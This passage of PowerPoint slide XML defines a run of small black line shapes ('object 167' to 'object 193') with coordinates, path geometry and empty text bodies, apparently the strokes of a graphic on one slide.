      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="object 167"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911348" y="5666623"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="23802">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="object 168"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2911348" y="5644926"/>
            <a:ext cx="1258" cy="45301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="22860">
                <a:moveTo>
                  <a:pt x="400" y="22579"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="22579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22855"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="object 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2938655" y="5664747"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25707">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="object 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2936476" y="5637590"/>
            <a:ext cx="2517" cy="52851"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="26669">
                <a:moveTo>
                  <a:pt x="0" y="26281"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="26557"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="object 171"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2966560" y="5664473"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25983">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="object 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2966559" y="5637344"/>
            <a:ext cx="0" cy="52851"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="26669">
                <a:moveTo>
                  <a:pt x="-2706" y="13340"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="13340"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="26681">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="object 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994466" y="5662858"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="27612">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="object 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994465" y="5635745"/>
            <a:ext cx="2517" cy="55367"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="27939">
                <a:moveTo>
                  <a:pt x="1098" y="27212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="27212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27488"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="object 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022318" y="5662329"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28137">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="object 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021236" y="5635254"/>
            <a:ext cx="1258" cy="55367"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="27939">
                <a:moveTo>
                  <a:pt x="0" y="27461"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="27737"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="object 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050226" y="5660450"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30042">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="object 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050226" y="5633410"/>
            <a:ext cx="1258" cy="57882"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="29210">
                <a:moveTo>
                  <a:pt x="546" y="28391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="28391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28667"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="object 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3078078" y="5660450"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="30042">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="object 180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3075899" y="5633410"/>
            <a:ext cx="2517" cy="57882"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="29210">
                <a:moveTo>
                  <a:pt x="0" y="28391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="28667"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="object 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105983" y="5656156"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="34377">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="object 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105982" y="5623726"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="-2706" y="16777"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="16777"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="33555">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="object 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3133889" y="5655088"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="35454">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="object 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3133888" y="5622684"/>
            <a:ext cx="2517" cy="67951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="34289">
                <a:moveTo>
                  <a:pt x="1098" y="33804"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="33804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="34080"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="object 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3161743" y="5649452"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="41142">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="object 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3160659" y="5611703"/>
            <a:ext cx="1258" cy="79276"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="40005">
                <a:moveTo>
                  <a:pt x="0" y="39346"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="39622"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="object 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189649" y="5645431"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="45201">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="object 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189649" y="5602273"/>
            <a:ext cx="1258" cy="88084"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="44450">
                <a:moveTo>
                  <a:pt x="546" y="44103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="44103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="44379"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="object 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3217501" y="5641956"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="48708">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="object 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3215324" y="5593394"/>
            <a:ext cx="2517" cy="96893"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="48894">
                <a:moveTo>
                  <a:pt x="0" y="48584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="48860"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="object 191"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3244861" y="5642493"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="48156">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="object 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3244861" y="5593900"/>
            <a:ext cx="1258" cy="96893"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="48894">
                <a:moveTo>
                  <a:pt x="0" y="24303"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151" y="24303"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="48606">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="object 193"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3273039" y="5577608"/>
            <a:ext cx="0" cy="113251"/>
          </a:xfrm>
